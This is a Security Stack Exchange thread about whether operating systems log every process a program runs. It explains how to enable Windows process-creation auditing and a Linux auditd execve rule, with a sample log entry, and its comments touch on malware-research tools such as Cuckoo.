I'm new to the security domain and I want to ask - Does every program leave an 'imprint' in a log of some kind, in a laptop or a PC - of whatever process it ran. If yes, can they be analysed?
2 Answers
Windows systems can log all processes that are started via system policy:
In Windows 2003/XP you get these events by simply enabling the Process Tracking audit policy. In Windows 7/2008+ you need to enable the Audit Process Creation and, optionally, the Audit Process Termination subcategories which you’ll find under Advanced Audit Policy Configuration in group policy objects.
These events are incredibly valuable because they give a comprehensive audit trail of every time any executable on the system is started as a process. You can even determine how long the process ran by linking the process creation event to the process termination event using the Process ID found in both events.
Linux systems can log all processes that are started using auditd:
In /etc/audit/audit.rules we need to ensure that the following exists.
-a exit,always -F arch=b64 -S execve
This will capture any execve system call (on exit) and will log this to the auditd log. A log entry will look similar to below.
type=SYSCALL msg=audit(1318930500.123:3020171): arch=c000003e syscall=59 success=yes exit=0 a0=7fff65179def a1=7fff65179ec0 a2=7fff6517d060 a3=7ff54ee36c00 items=3 ppid=9200 pid=9202 auid=0 uid=1000 gid=100 euid=1000 suid=1000 fsuid=1000 egid=100 sgid=100 fsgid=100 tty=(none) ses=4 comm="xscreensaver-ge" exe="/usr/bin/perl" key=(null) type=EXECVE msg=audit(1318930500.123:3020171): argc=5 a0="/usr/bin/perl" a1="-w" a2="/usr/bin/xscreensaver-getimage-file" a3="--name" a4="/home/welby/Pictures
If data exists, it can be analyzed :). But these are just methods of enabling the data capture.
- 71,975
- 17
- 161
- 198
No, not every program is configured to generate logs.
There are "wrappers" for programs that will generate logs for each process that it runs, and these are used for debugging or for malware research.
- 123,438
- 55
- 284
- 319
-
I ask for malware research itself. So every computer does not have a centralized log of what is going on within? Bummer... – Prathiba Sep 03 '15 at 22:58
-
2If you think about it, that log would be massive within hours. There is little value in recording all that data. – schroeder Sep 03 '15 at 23:02
-
Please include the context you have in your question. It really helps us to refine our answers. If you are asking about malware research, you need to look at `cuckoo`. – schroeder Sep 03 '15 at 23:03
-
Thank you. My line of thought was to look the various processes and find malware by analysis in a PC. As i said - I'm new. So I wanted to check whether this was possible. Cuckoo needs to be downloaded. Anything built in that could help with the analysis? – Prathiba Sep 03 '15 at 23:10
-
Built-in where? – schroeder Sep 03 '15 at 23:12
-
In the user's computer. – Prathiba Sep 03 '15 at 23:16
-
Windows? Linux? Other? Different things are built-in to different systems. – schroeder Sep 03 '15 at 23:17
-
Oh... Say windows or linux... Could you please let me know for those OSes.. – Prathiba Sep 03 '15 at 23:24
-
1@Thiba - I think it might be helpful if you [edit](https://security.stackexchange.com/posts/98493/edit) your question and fill in the details. Describe what type of research you are doing, on what OSs, what's your goal, what research you've done already, etc... – Neil Smithline Sep 04 '15 at 00:57